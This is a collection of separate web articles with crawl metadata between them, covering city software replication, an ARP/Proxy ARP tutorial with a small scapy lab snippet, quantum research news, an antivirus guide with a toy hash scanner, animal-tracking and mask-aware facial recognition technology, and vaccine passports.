Take mobility, for example. Many of Europe's cities aim to be carbon neutral within a few decades – which means moving to a low carbon transport system. To make the change, cities need to juggle many moving parts, from urban planning to implementing different transport services and assessing shifting demand. This is where data-driven solutions come in. The City of Bergen built the replicable Mobility Dashboard to collate available but disparate near-real-time data on mobility in one user-friendly place. Bergen's traffic data is now available to urban planners, helping them choose the best places for bike infrastructure, optimize mobility services, and locate charging points for electric vehicles. However, when the Mobility Dashboard was sized up as a potential solution for another city, limitations were found surrounding the amount and type of data used. Having more eyes on the code allowed Bergen to improve what they have, correct mistakes, and ensure their service meets a broader range of needs.

To access these benefits, the developer – in this case, Bergen – needs to facilitate co-development and replication by sharing the original solution with all the necessary information. If you're a city looking to co-develop or re-use, what's available? Beyond the technical requirements, it's important to know the right questions to ask. The unique nature of urban ecosystems means a public service software solution will rarely be perfect off the shelf. Instead, it's crucial to get to the root of the city's requirements, engage stakeholders, and tap into networks to determine which generic components of tried and tested solutions could be reused in a new context.

Preparing a City for Software Replication

There are a number of factors that enable successful, simple software replication:

- Pinpoint the Need: Successful digital public service delivery should be based on a real need, with viable applications and, ideally, policy backing.
- Engage your Stakeholders: Making sure city departments, local agencies, the private sector, and end-users are on board is crucial – and a great way to do this is by building a strong business case together.
- Unique Problems Don’t Need Unique Solutions: Data can be the starting point for replicating public service solutions. While each city has different needs, every city collects data, and once the right, interoperable data source has been found, you can easily align the tech to make use of it. - Ask the Right Questions: When a potential solution has been found, there are many important questions to ask to assess which components are useful to reuse and prepare a replication strategy. - Plugin and Play: Replication means figuring out how to best re-use existing data sources in the software available without overhauling an entire city’s IT system. - Be Ready to Adapt: A few technical changes will probably be necessary to ready software for its new context, but the replication process also offers new perspectives that could help you reconsider existing practices and which could even trigger innovation. Read a detailed breakdown of the steps to successful replication in the SCORE Replication Guide. By replicating existing open-source software solutions for public service delivery, cities can stay in control of their data while accessing wider expertise and networks in the co-development process. The bottom line is better public service delivery at a lower cost.
In preparation for the CCNA exam, we want to make sure we cover the various concepts you could see on your Cisco CCNA exam. So to assist you, below we will discuss ARP, IARP, RARP and Proxy ARP.

ARP, IARP, RARP, and Proxy ARP?

When I first started studying for my CCNA years ago, one of the things that confused me was ARP. Or rather, what ARP did as opposed to Reverse ARP, Inverse ARP, and Proxy ARP! One book would mention ARP without mentioning the other variations, one would mention RARP but not Proxy ARP, and so on. I never forgot how confusing this was to me when I started. To help current CCNA candidates with this confusing topic, let's take a look at each one of these technologies.

ARP – Address Resolution Protocol

You may well know what ARP does from your networking studies or work on a LAN, but to effectively troubleshoot ARP issues on a WAN, you need to take into account the network devices that may be separating the workstations in question. The basic ARP operation is simple enough. We concentrate on IP addressing a great deal in our studies and our jobs, but it's not enough to have a destination IP address in order to send data; the transmitting device must have a destination MAC address as well. If the sender doesn't know the MAC address of the destination, it has to get that address before data can be sent.

To obtain the unknown Layer Two address when the Layer Three address is known, the sender transmits an ARP Request. This is a Layer Two broadcast, which has a destination address of ff-ff-ff-ff-ff-ff. Since Ethernet is a broadcast medium, every other device on the segment will see it. However, the only device that will answer it is the device with the matching Layer Three address. That device will send an ARP Reply, unicast back to the device that sent the original ARP Request. The sender will then have a MAC address to go with the IP address and can transmit.

Several kinds of network devices may sit between our two hosts, and for the most part, they have no impact on ARP. Since this is Cisco, though, there's gotta be an exception! Let's take a look at how these devices affect ARP.

Repeaters and hubs are Layer One (Physical Layer) devices. A repeater's job is simply to regenerate a signal to make it stronger, and a hub is simply a multiport repeater, so neither has any impact on ARP.

Switches are Layer Two devices, so you might think they impact ARP's operation; after all, ARP deals with getting an unknown MAC address to correspond with a known IP address. While that's certainly true, switches don't impact ARP for one simple reason: switches forward broadcasts out every port except the one the broadcast was originally received on. The ARP Reply will be unicast back to the device requesting it, as in the previous example.

Now here's the exception: a router. Routers accept broadcasts, but routers will not forward them. For example, consider a PC with the address 172.16.1.10 /16. That host assumes it's on the same physical segment as the device 172.16.2.10 /16, since both IP addresses fall in the same subnet (172.16.0.0 /16). The problem here is that a router actually separates the two devices, and the router will not forward the ARP broadcast. The Cisco router will answer the ARP Request, however, with the MAC address of the router interface the ARP Request was received on. In this case, the router will respond to the ARP Request with its own E1 interface's MAC address.

When the device at 172.16.1.10 receives this ARP Reply, it thinks the MAC address of 172.16.2.10 is 11-11-11-11-11-11. From then on, traffic destined for the remote host carries the destination IP address 172.16.2.10, but the destination MAC address is actually that of the router's E1 interface. This behavior is called Proxy ARP. It runs by default on Cisco 2500, 1841, 2811 and 1941 routers, but it can be turned off at the interface level with the no ip proxy-arp command.
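If you want to watch this resolution happen in your own lab, here is a small sketch using the third-party Python library scapy. The library is our choice for illustration (it is not part of any Cisco toolkit), and sending raw frames typically requires administrator or root privileges on your machine. The target address matches the example above and is purely illustrative.

```python
from typing import Optional
from scapy.all import ARP, Ether, srp  # pip install scapy; run with root privileges

def arp_who_has(target_ip: str, timeout: float = 2.0) -> Optional[str]:
    """Broadcast an ARP Request for target_ip; return the MAC that answers."""
    frame = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=target_ip)
    answered, _ = srp(frame, timeout=timeout, verbose=False)
    for _, reply in answered:
        return reply[ARP].hwsrc
    return None  # no ARP Reply: host down, filtered, or truly remote

# On the segment above, this would print the router's E1 MAC address,
# because Proxy ARP answers on behalf of 172.16.2.10.
print(arp_who_has("172.16.2.10"))
```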
RARP and Inverse ARP

Reverse ARP is a lot simpler! RARP obtains a device's IP address when the device already knows its own MAC address. (If a device doesn't know its own MAC address, you have bigger problems than RARP!) A separate device, a RARP server, tells the device what its IP address is in response to the RARP Request. As you can see, RARP and DHCP have a lot in common.

Inverse ARP doesn't resolve MAC addresses at all. Instead, it dynamically maps local DLCIs to remote IP addresses when you configure Frame Relay. Many organizations prefer to create these mappings statically; you can turn the default behavior off with the interface-level command no frame-relay inverse-arp.

We hope you found this Cisco certification article helpful. We pride ourselves on not only providing top-notch Cisco CCNA exam information, but also providing you with the real-world Cisco CCNA skills to advance in your networking career.
Quantum News Briefs September 9: Crushed plastic bottles could create nanodiamonds for quantum sensors; New device-independent quantum cryptography method could provide more secure encryption; Commonwealth of Massachusetts awards $3.5M R&D grant for new Northeastern University quantum facility & MORE

Quantum News Briefs September 9 begins with an explanation of how crushed plastic bottles could create nanodiamonds for quantum sensors, followed by a new device-independent quantum cryptography method that could provide more secure encryption. The Commonwealth of Massachusetts awarding a $3.5M R&D grant for a new Northeastern University quantum facility is third, & MORE.

Crushed plastic bottles could create nanodiamonds for quantum sensors

A research team has used laser flashes to simulate the interior of ice planets, spurring a new process for producing the type of minuscule diamonds that are essential for quantum sensors. The research and its implications were reported in Engineering & Technology (E&T) and are summarized here.

The international team, headed by the Helmholtz-Zentrum Dresden-Rossendorf (HZDR), the University of Rostock and France's École Polytechnique, conducted a novel experiment to determine what goes on inside ice planets such as Neptune and Uranus. The researchers fired a laser at a thin film of simple PET plastic and investigated what happened using intensive laser flashes. One result was that the researchers were able to confirm that it really does 'rain diamonds' inside the ice giants at the periphery of our solar system. This method could establish a new way of producing nanodiamonds, which are needed, for example, for highly sensitive quantum sensors. The group has presented its findings in the journal Science Advances.

The conditions in the interior of icy giant planets such as Neptune and Uranus are extreme: temperatures reach several thousand degrees Celsius and the pressure is millions of times greater than in the Earth's atmosphere. Nonetheless, states like this can be simulated briefly in the lab: powerful laser flashes hit a film-like material sample, heat it up to 6,000°C for the blink of an eye, and generate a shock wave that compresses the material for a few nanoseconds to a million times the atmospheric pressure. Ice giants not only contain carbon and hydrogen but also vast amounts of oxygen. When searching for a suitable film material, the group hit on an everyday substance: PET, the resin out of which ordinary plastic bottles are made. "PET has a good balance between carbon, hydrogen and oxygen to simulate the activity in ice planets," Kraus said.

The experiment also opens up perspectives for a technical application: the tailored production of nanometre-sized diamonds, which are already included in abrasives and polishing agents. In the future, it is predicted that they will be used as highly sensitive quantum sensors.

New device-independent quantum cryptography method could provide more secure encryption

Researchers at the National University of Singapore (NUS) have developed a new protocol for device-independent QKD, or DIQKD. Quantum News Briefs summarizes the NewsDeal coverage below.

In device-independent QKD, the security of the cryptographic protocol does not depend on the device used. For the exchange of quantum mechanical keys, either light signals are sent to the receiver by the transmitter or entangled quantum systems are used. In the new protocol, two measurement settings are used for key generation rather than just one.
“By introducing the additional setting for key generation, it becomes more difficult to intercept information, and therefore the protocol can tolerate more noise and generate secret keys even for lower-quality entangled states,” said Charles Lim from NUS. Lim is also one of the authors of the study. In conventional QKD methods, security can be guaranteed when the quantum devices used have been characterised well. “And so, users of such protocols have to rely on the specifications furnished by the QKD providers and trust that the device will not switch into another operating mode during the key distribution,” explained Tim van Leent, one of the lead authors. Researchers hope that their method will now help generate secret keys with uncharacterised and untrustworthy devices. They are now aiming to expand the system and incorporate several entangled atom pairs. Commonwealth of Massachusetts awards $3.5M R&D grant for new Northeastern University quantum facility The Baker-Polito Administration in Massachusetts has announced a new $3.5 million grant for the Experiential Quantum Advancement Laboratories (EQUAL), a nearly $10 million project to advance the emerging quantum sensing and related technology sectors in the state. Quantum News Briefs shares key points of the announcement below. The Northeastern-led project will establish new partnerships and leverage several ongoing ones with academic institutions and industry partners. The aim is to develop next-generation quantum technologies, boost training in quantum information science and engineering for students and workers, and establish greater partnerships among industry and government around quantum sensing and related technologies. The new award, from the Commonwealth’s Collaborative Research and Development Matching Grant program managed by the Innovation Institute at the Massachusetts Technology Collaborative (MassTech), will advance quantum information sciences, a priority focus area for the R&D Fund. The targeted investment has strong potential for near-term economic impacts, including the creation of new jobs and revenue growth at industry partners, several of which attended Wednesday’s announcement. The grant will support the development of new ultrasensitive, room-temperature quantum sensors, facilities which will provide a vital and unique capability in the state. By focusing on sensors, which are less technically demanding than developing entire quantum computers, Northeastern is undertaking research that provides viable pathways to commercialization within the next two to five years. The project will include a strong focus on workforce training, responding to the growing need for workers that are literate in quantum information sciences. See complete news release here. New stable quantum batteries can reliably store energy in electromagnetic fields Quantum technologies need energy to operate. This simple consideration has led researchers, in the last ten years, to develop the idea of quantum batteries, which are quantum mechanical systems used as energy storage devices. In the very recent past, researchers at the Center for Theoretical Physics of Complex Systems (PCS) within the Institute for Basic Science (IBS), South Korea have been able to put tight constraints on the possible charging performance of a quantum battery. Specifically, they showed that a collection of quantum batteries can lead to an enormous improvement in charging speed compared to a classical charging protocol. 
This is thanks to quantum effects, which allow the cells in quantum batteries to be charged simultaneously. Despite these theoretical achievements, the experimental realizations of quantum batteries are still scarce. The only recent notable counter-example used a collection of two-level systems (very similar to the qubits just introduced) for energy storage purposes, with the energy being provided by an electromagnetic field (a laser). Given the current situation, it is clearly of uttermost importance to find new and more accessible quantum platforms which can be used as quantum batteries. With this motivation in mind, researchers from the same IBS PCS team, working in collaboration with Giuliano Benenti (University of Insubria, Italy), recently decided to revisit a quantum mechanical system that has been studied heavily in the past: the micromaser. Micromaser is a system where a beam of atoms is used to pump photons into a cavity. Put in simple terms, a micromaser can be thought of as a configuration specular to the experimental model of quantum battery mentioned above: the energy is stored into the electromagnetic field, which is charged by a stream of qubits sequentially interacting with it. The IBS PCS researchers and their collaborator showed that micromasers have features that allow them to serve as excellent models of quantum batteries. One of the main concerns when trying to use an electromagnetic field to store energy is that in principle, the electromagnetic field could absorb an enormous amount of energy, potentially much more than what is necessary. Sandra K. Helsel, Ph.D. has been researching and reporting on frontier technologies since 1990. She has her Ph.D. from the University of Arizona.
<urn:uuid:e39abd9b-b052-493e-856f-43b637f2e879>
CC-MAIN-2022-40
https://www.insidequantumtechnology.com/news-archive/quantum-news-briefs-september-9-crushed-plastic-bottles-could-create-nanodiamonds-for-quantum-sensors-new-device-independent-quantum-cryptography-method-could-provide-more-secure-cncryption-commonw/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00133.warc.gz
en
0.925626
1,697
2.875
3
Whether you’re new to technology or use a handful of devices on a daily basis, you may often wonder, “Why is cybersecurity important?” Every year, millions of pieces of malware threaten devices and networks all around the world. Users are often surprised by how much damage these attacks can cause. However, in many cases, such devastation is entirely preventable. Antivirus software – if maintained properly – can provide powerful protection against a variety of threats. As such, it should form the basis of any modern security protocol.
How Does Antivirus Software Work?
Antivirus software is designed to scan files consistently to determine whether any new cybersecurity threats have emerged. These may be found within emails, downloads, and general web surfing. As soon as antivirus systems detect potential threats, they can either warn users, block problematic websites, or, in some cases, eliminate the problem altogether. While many people think of antivirus as a single solution, it actually consists of a comprehensive suite of features designed to pinpoint and handle a wide array of threats. Top methods include:
- Signature Analysis – One of the most important types of antivirus protection, signature analysis is the backbone of many modern programs. Under this approach, vendors catalog the traits associated with various viruses to streamline detection (a minimal sketch of this idea appears at the end of this piece).
- Heuristic Analysis – Today’s sophisticated hackers often disguise malicious code in hopes of deceiving antivirus programs. Heuristic analysis takes this unfortunate reality into account while making it possible to stay one step ahead. Under this method, previously unknown viruses can be detected through scans that flag suspicious properties.
- Sandbox Detection – Under this system, suspicious programs run in an isolated environment, separated from the rest of the machine, in the interest of containing Advanced Persistent Threats (APTs). (Malware that tries to recognize and escape such environments is said to practice “sandbox evasion.”)
- Behavior Monitoring – Under this approach, antivirus systems monitor all traffic that occurs between computers and devices, such as external hard drives or printers. This solution can often undo changes made by external devices.
How to Choose the Right Antivirus Solution
While any antivirus solution is better than none at all, the level of protection varies dramatically from one program to the next. This can make it difficult to choose software, especially when budget comes into play. The first consideration? Free versus paid antivirus. No-cost programs can be helpful in some circumstances but often lack the convenient features offered with paid systems. Many providers have both free and paid versions of the same program. Some users find it helpful to begin with the free option and upgrade as needed. Other factors worth considering when selecting an antivirus system include:
- Compatibility with Your Current Devices – Most antivirus programs work with Apple and Microsoft, but Linux users sometimes struggle to find compatible offerings.
- Threat Prevention Features – Some antivirus suites go beyond scanning to include techniques for proactively avoiding future attacks. For example, web browsing protection filters URLs to determine whether some might place users at an increased risk.
- Device Speed – In some cases, antivirus programs are effective for detecting and mitigating threats – but at the steep cost of computer speed. Although eager to boost security, many users are not willing to compromise on how efficiently their devices run. Ideally, everyday tasks such as loading applications, downloading files, or streaming videos will not be impacted by antivirus solutions.
- Detection Rates – Not all antivirus programs are equally effective at detecting threats. Some fail to spot or handle issues promptly, while others go overboard and alert users to ordinary traffic. Overly aggressive thresholds can quickly grow annoying. Frequent false positives could even result in the removal of important files.
The Importance of Updating Antivirus Programs
Unfortunately, antivirus protection is not a one-time prospect. New threats emerge every day. As such, even the best programs can quickly become outdated if not updated regularly. However, many people neglect to update antivirus software as often as necessary. This may explain why, despite 95 percent of people claiming to use antivirus programs, many continue to see their devices infected. While antivirus solutions consistently scan for new infections, there are only so many types of viruses or malware they’re equipped to handle. Attackers are constantly developing new systems that can get around even the strongest security features. As such, it doesn’t take long for antivirus programs to fall behind. Updates are also essential in that they provide patches for flaws. Hackers often take advantage of these vulnerabilities, so it’s imperative that they’re addressed as quickly as fixes become available. Thankfully, many antivirus solutions offer automatic updates that can be made on the spot without user interference. This is particularly important for those who tend to procrastinate even when regularly alerted to the need for security updates.
Level Up Your Antivirus Protection with NerdsToGo Charlotte
Have you fallen behind on installing or updating antivirus protection? If you’re not confident about handling it on your own, don’t worry. You can count on the team from NerdsToGo for help. In addition to antivirus solutions, we offer a variety of other business services designed to keep both your business network and personal devices secure. Contact us today to learn more about our antivirus and other computer security offerings!
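As promised in the signature-analysis bullet, here is a minimal, hypothetical sketch of the idea in Python. Real engines match byte patterns and partial signatures far more efficiently than a whole-file hash; the single entry in the toy database is the widely published SHA-256 digest of the harmless EICAR test file.

```python
import hashlib

# Hypothetical signature database: known-bad SHA-256 digests.
# Real antivirus engines use far larger databases plus heuristics.
KNOWN_BAD_HASHES = {
    "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",  # EICAR test file
}

def scan_file(path: str) -> bool:
    """Return True if the file's hash matches a known signature."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        # Read in chunks so large files don't have to fit in memory.
        for chunk in iter(lambda: f.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest() in KNOWN_BAD_HASHES
```

This also shows why signature analysis alone is not enough: flipping a single byte of a malicious file changes its hash, which is exactly the gap heuristic analysis is meant to close.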
<urn:uuid:457426ce-61e0-41a1-8d9f-57f48c0b3ae5>
CC-MAIN-2022-40
https://www.nerdstogo.com/blog/2020/october/the-importance-of-antivirus-software-how-to-keep/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00133.warc.gz
en
0.933647
1,080
3.28125
3
It’s a movie trope as old as cinema. A heated chase scene ends as the bad guy seamlessly blends into a crowd, pulling up his collar, safe in a swarm of people. But thanks to researchers at the Spanish National Research Council (CSIC), this scene may have a different ending: the pursuer pulls out a tablet and uses newly developed software called idTracker to pinpoint the assailant’s exact location in the crowd. From a cinematic perspective it’s a slightly less exciting conclusion, but technologically it’s groundbreaking: there may no longer be safety in numbers. Typically, computers have not been able to identify individuals (of any species) when they group together for more than a few seconds. But the CSIC team have developed new algorithms that may be able to change this. The abstract for the paper on idTracker in Nature Methods defines the project as “a multitracking algorithm that extracts a characteristic fingerprint from each animal in a video recording of a group. It then uses these fingerprints to identify every individual throughout the video. Tracking by identification prevents propagation of errors, and the correct identities can be maintained indefinitely”. The current application of the software is mapping the behaviour of different animal species in groups. ‘Group mentality’ across the species is a widely accepted concept, but the intricacies of group dynamics in different animals have been difficult to track and characterise up until this point. The CSIC research group have already used the software to track the behaviours of groups of fish, flies, ants and mice. Alfonso Pérez Escudero, a CSIC researcher during the preparation of this study, stated “in the short term, this will be used in science, but in the longer term, the method we have developed can be applied to recognize people in large crowds, vehicles or parts in a factory, for instance”. Bad guys can rest safe among throngs of people, but only for now.
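As a toy illustration of the “tracking by identification” idea (and only that; the published idTracker algorithm extracts far richer fingerprints than this), here is a minimal sketch: each individual gets a reference “fingerprint”, and each new detection is assigned to whichever reference is closest.

```python
import numpy as np

def fingerprint(patch: np.ndarray, bins: int = 32) -> np.ndarray:
    """Toy 'fingerprint': a normalized intensity histogram of an image patch."""
    hist, _ = np.histogram(patch, bins=bins, range=(0, 255))
    return hist / max(hist.sum(), 1)

def identify(patch: np.ndarray, references: dict) -> str:
    """Assign the patch to the individual with the closest reference fingerprint."""
    fp = fingerprint(patch)
    return min(references, key=lambda name: np.linalg.norm(references[name] - fp))
```

The point of matching every detection against fixed references, rather than linking frame to frame, is the one the abstract makes: a single mistaken handoff no longer propagates through the rest of the video.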
<urn:uuid:dfe78d4a-7758-4b22-9493-82669d881e08>
CC-MAIN-2022-40
https://dataconomy.com/2014/06/idtracker-bringing-end-safety-numbers/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335058.80/warc/CC-MAIN-20220927194248-20220927224248-00133.warc.gz
en
0.935377
404
2.6875
3
Facial Recognition Can See Through Masks. Examples and Use Cases
The world is already living through the third wave of COVID-19. The virus has surged across the globe, and we’re not sure when it will vanish. One thing we are sure of is that digital technology will soften its blow. That’s why the debate over facial recognition is taking a new turn. Until recently labelled a ‘funny face filters’ and ‘identity verification’ technology, facial recognition is gaining traction in other industries. The growing demand for the technology has arisen from the impact of the pandemic and the need to get ahead of it. It could prove to be our Swiss army knife in the war against COVID-19, and here’s why. The technology unveils contactless solutions that are safe to use during the virus outbreak. Touchless body temperature detection, employee entry and attendance, face mask detection, return-to-work solutions for social distance tracking: none of that would have been possible without facial recognition.
Facial Recognition for Mask Detection
It’s safe to say that the technology is adapting to a mask-wearing public. The more people wear masks in everyday life, the more AI developers adapt by creating masked face datasets. Researchers from NIST report that masked images raised even the top algorithms’ failure rate to about 5%, while many otherwise competent algorithms failed between 20% and 50% of the time. That paints a picture of how the technology is still adapting to these new circumstances. The main challenge of face recognition in 2021 is to learn how to detect and recognize masked faces in dataset images. Datasets are needed to train face identification and recognition algorithms. Images in datasets often have different mask types, orientations and occlusions, which makes detection a complex task. Detection with occlusions is hard due to the lack of masked datasets (difficulty in learning the key facial attributes) and the lack of facial landmarks in the masked regions (masks add noise to the image). Though this problem has been brought into the spotlight, it is still important to create large masked datasets and improve the existing solutions.
Recent Use Cases
With the challenges of masked face detection covered, let’s see how companies and organizations are adapting to the masks-are-the-new-black trend.
Real-Time Mask Monitoring
Hewlett Packard Enterprise has rolled out a few return-to-work solutions that help companies bring their employees back to work safely. Its distance-tracking solution is equipped with video analytics to monitor mask usage in areas where masks are required. The solution is a simple and effective way to make sure that office workers follow safety standards at work.
In the wake of the coronavirus, NEC Corp., known for its ‘solutions for society’, has developed a biometric device that can recognize people wearing masks. The device scans the face of a person and their irises. The company claims that the device offers contactless masked face detection with a low error rate. NEC’s vice president noted that there is nothing extraordinary about testing their facial recognition algorithms on face masks: masks are common in Japan, especially during flu seasons. And Japan is not the only country trying to get ahead in the masked face detection and recognition race in Asia. China is getting bullish about face recognition and mass AI adoption. SenseTime, a promising Chinese startup, released software that enables employee building entry and access with a half-covered face. The software recognizes facial features like the eyes, eyebrows and nose bridge, making identification through a face mask possible. As for efficiency, there is still room for improvement, because touch-free transactions can sometimes take several attempts.
France has been using AI to monitor whether people are wearing masks on public transport. The software was deployed around the country with a mission to identify those who don’t wear masks. Wearing masks in public places is mandatory in France; if the situation gets worse, authorities may consider penalizing those who don’t comply with the rules.
Sunwin Bus Corporation from Shanghai has rolled out a ‘Healthcare Bus’ that integrates biometric solutions with body temperature detection. It identifies passengers without masks and uses UV light to disinfect the environment. As the company puts it, the bus ‘provides safety in a non-invasive way’.
By the end of 2020, the number of masked face detection solutions had increased. Digital Barriers launched a monitoring solution with a face detection feature. The main goal was to help retailers provide a safe environment for their workers. The software detects missing face masks and analyzes how crowded a store is. Those without a mask are not allowed in; as for crowdedness, the software helps maintain social distancing.
Body Temperature Scanning
Telpo, one of the world’s leading smart terminal manufacturers, has developed a face recognition temperature measuring device. The solution uses AI and facial recognition for masked face detection and contactless temperature scanning. The device determines whether a person is wearing a mask; if not, it reminds them to put one on. The face recognition software cannot yet reliably handle people wearing glasses.
Detecting Sneezes and Coughs
The solution developed by Sensory is yet more evidence of successful mask detection through facial recognition. The company is responding to the coronavirus by adapting its TrulySecure platform to help developers create anti-COVID-19 solutions. It can not only perform facial recognition under concealing masks but also detect sneezes and coughs. Combining both face and voice in their SDK, the team killed two birds with one stone: they unveiled a solution that helps essential workers maintain safety measures, and gave developers a chance to develop the technology further.
There’s more. It’s no news that face recognition used to fail to authenticate users wearing glasses or a mask; most enrollments were blocked if the person was wearing one. Recently, the face recognition market has been flooded with SDKs of all sorts. An SDK is essentially a set of features that enables real-time face detection and recognition. If you’re looking for a robust facial recognition SDK, check out the software delivered by our tech team. By integrating an SDK into your system, you can do facial recognition under concealing masks with ease (a minimal sketch of the detection step follows at the end of this piece).
Facial Recognition: Changing Dynamics Due to Pandemic
In the wake of COVID-19, the demand for face recognition is enormous. The technology might be in its infancy, but it’s getting stronger and more accurate over time. And its application is diverse: social distancing and contact tracing, selfie-based solutions for the quarantined, temperature detection, contactless border management, mask detection for safety measures and more. All of that we owe to facial recognition. The virus outbreak has led to hybrid solutions combining face recognition and biometrics. And that’s only the beginning. The pandemic is expected to speed up technology adoption in the healthcare industry, and it is already doing so.
Develop Custom Face Recognition Software With InData Labs
Have an idea for a face recognition project? Schedule a call with our team of CV experts. Contact us at firstname.lastname@example.org.
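As promised above, here is what the detection step of a mask-aware pipeline might look like in code. The face detector is OpenCV’s standard Haar cascade, which ships with opencv-python; `mask_model` stands in for a hypothetical classifier trained on a masked-face dataset and is not part of any SDK named in this article.

```python
import cv2

# Standard OpenCV frontal-face detector (bundled with opencv-python).
face_cascade = cv2.CascadeClassifier(
    cv2.data.haarcascades + "haarcascade_frontalface_default.xml"
)

def find_unmasked_faces(frame, mask_model):
    """Detect faces, then ask a (hypothetical) classifier which ones lack masks."""
    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    faces = face_cascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=5)
    unmasked = []
    for (x, y, w, h) in faces:
        crop = frame[y:y + h, x:x + w]
        if mask_model.predict(crop) == "no_mask":  # assumed interface
            unmasked.append((x, y, w, h))
    return unmasked
```

Note the irony the article itself points out: a plain frontal-face cascade is exactly the kind of detector that struggles with occluded faces, which is why large masked-face datasets matter so much.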
<urn:uuid:1321296d-c75c-4b67-8f13-b43227617030>
CC-MAIN-2022-40
https://indatalabs.com/blog/facial-recognition-mask-detection
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335469.40/warc/CC-MAIN-20220930113830-20220930143830-00133.warc.gz
en
0.934988
1,555
2.578125
3
Fixing data quality issues is only part of the solution. In order for these issues not to recur, one needs to identify the root cause and stop poor-quality data from being created in the first place. As we know, for every effect there is a cause, and that’s the basis of root cause analysis. The chain of relationships between a cause and its effect can vary in length, but as one moves along the chain, the cause and effect become finer and finer until you get to the root. There are different techniques to identify the root cause, 2 of which I’ve covered earlier: the 5 whys technique and the fishbone diagram. This week I’ll go over the barrier analysis: a root cause analysis technique that helps identify both the pathways through which a hazard (in this case, a cause of poor data quality) can affect the quality of the data and the measures through which the quality of the data can be maintained.
There are four basic elements in the barrier analysis:
- Target = In the context of data quality, it represents the desired level of quality for the chosen data set.
- Hazard/Threat = This is the way in which the target can be harmed. In the context of data quality, this represents the agent that can adversely affect the desired state of data quality.
- Barrier = A prevention method placed between the hazard and the target so that the hazard does not have an undesired effect on the target. A barrier can be active (i.e. its protective nature needs the actions of an agent – such as a Data Quality Coordinator) or passive (i.e. no additional action on the part of any agent is required – such as an address cleansing API). Note: in some versions, a Barrier is passive and a Control is a synonym for an Active Barrier.
- Pathway = A route or mechanism through which a hazard can undesirably affect a target.
The barrier analysis is tied to the Swiss cheese model, which is a barrier analysis with multiple barriers – each represented by a slice of Swiss cheese 🧀. Why Swiss cheese? Because each potential point of failure within a barrier, or control, is like a hole in a slice of Swiss cheese.
When to use
- To determine the causes of poor data quality along with the data lineage
- When you want to create an inventory of the sources of data and data lineage from the perspective of data quality
- When you need to identify which countermeasures failed to prevent an undesired change
Pros
- A simple technique to learn, which does not require training
- Findings can be easily transformed into corrective action recommendations
- Works well with other methods and techniques, such as the Pareto analysis, fishbone diagram and the 5 whys
Cons
- Poses a risk of promoting linear thinking
- Can be subjective and dependent on the views and knowledge of the participants
- The findings might not be repeatable if you go through the same exercise with other stakeholders
How much is poor data quality costing your organization? Here’s how you can estimate that in 5 simple steps.
Steps to develop it
- Identify the main target: Identify the main data quality issue that you would like to uncover the root cause of.
- Gather the main stakeholders: Once the data quality issue is identified, identify the main stakeholders affected by the issue or taking part in the processes that create or prevent the issue.
- Identify the barriers: Start documenting the barriers you are aware of that prevent the issue from happening, but also any barriers that might be in place that facilitate the issue. For simplicity, you can also determine the categories they fall under. For example: training, tool, data source, process, standard.
- Determine solutions: Go through each of these barriers and understand the cause and effect of each, which might identify further barriers, but also solutions. Here are some of the questions which should be addressed for each barrier (a small sketch of a barrier inventory in code follows below):
- Did the Barrier perform its intended function under normal operating conditions?
- Did the Barrier perform its intended function under the upset or faulted conditions?
- Did the Barrier mitigate the Hazard severity?
- Was the Barrier design adequate?
- Was the Barrier developed to meet the desired specifications?
- Was the Barrier maintained?
- Has the Barrier yielded the desired test results?
Tips
- Review the barrier analysis results independently
- Don’t solely use this technique to determine the root causes, but use it in conjunction with others
Tools you can use
- Classic whiteboard/flipchart
- Visio diagram
- Word document
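For readers who prefer to keep their barrier inventory in code rather than on a whiteboard, here is a minimal Python sketch. The class, fields, and example values are invented for illustration; the review questions above map onto the entries of the checks dictionary.

```python
from dataclasses import dataclass, field

@dataclass
class Barrier:
    name: str
    kind: str            # e.g. "training", "tool", "data source", "process", "standard"
    active: bool         # active barriers need an agent; passive ones do not
    checks: dict = field(default_factory=dict)  # review question -> True/False finding

    def failed(self) -> bool:
        """A barrier with any failed check is a candidate for corrective action."""
        return not all(self.checks.values())

# Example: an address cleansing API modeled as a passive barrier.
api = Barrier(
    name="Address cleansing API",
    kind="tool",
    active=False,
    checks={
        "performed intended function under normal conditions": True,
        "design adequate": False,
        "maintained": True,
    },
)

failed_barriers = [b.name for b in [api] if b.failed()]
print(failed_barriers)  # -> ['Address cleansing API']
```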
<urn:uuid:a1d1c5f7-33fe-4a3d-92e5-daba1d800a48>
CC-MAIN-2022-40
https://www.lightsondata.com/how-to-use-barrier-analysis-for-improved-data-quality/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337504.21/warc/CC-MAIN-20221004121345-20221004151345-00133.warc.gz
en
0.920781
959
2.71875
3
As access to the COVID-19 vaccine continues to expand rapidly, the end of careful quarantining – and a new beginning for travel and events – feels closer than ever. While this is good news for the businesses and travel destinations that have suffered the greatest losses over the last year, new questions have already begun to pop up regarding the protocols and safety mechanisms that will be necessary to minimize COVID-19 transmission as travel and events start to resume. At the center of this next wave of debate: the vaccine passport.
From a public health perspective, vaccine passports would greatly reduce the potential for unvaccinated individuals to spread the virus and jeopardize efforts to reach herd immunity. At the same time, management and verification of protected health information (PHI) opens the door to a new set of data privacy concerns. A true vaccine passport initiative would be interoperable on a global scale – spanning hundreds of countries and dozens of industries. The closest example of an identity project of this magnitude is today’s global passport system, which took more than 50 years to develop and remains reliant on printed documents. Creating a modern, digital vaccine passport solution will have challenges, starting with the need for privacy and protection of PHI. And there will be usability and accessibility challenges to overcome as well. While past passport and credential efforts may not offer a perfect template to follow, the lessons learned from those projects can still serve as valuable best practices as modern vaccine passport initiatives pick up steam. Let’s take a closer look at two critical lessons:
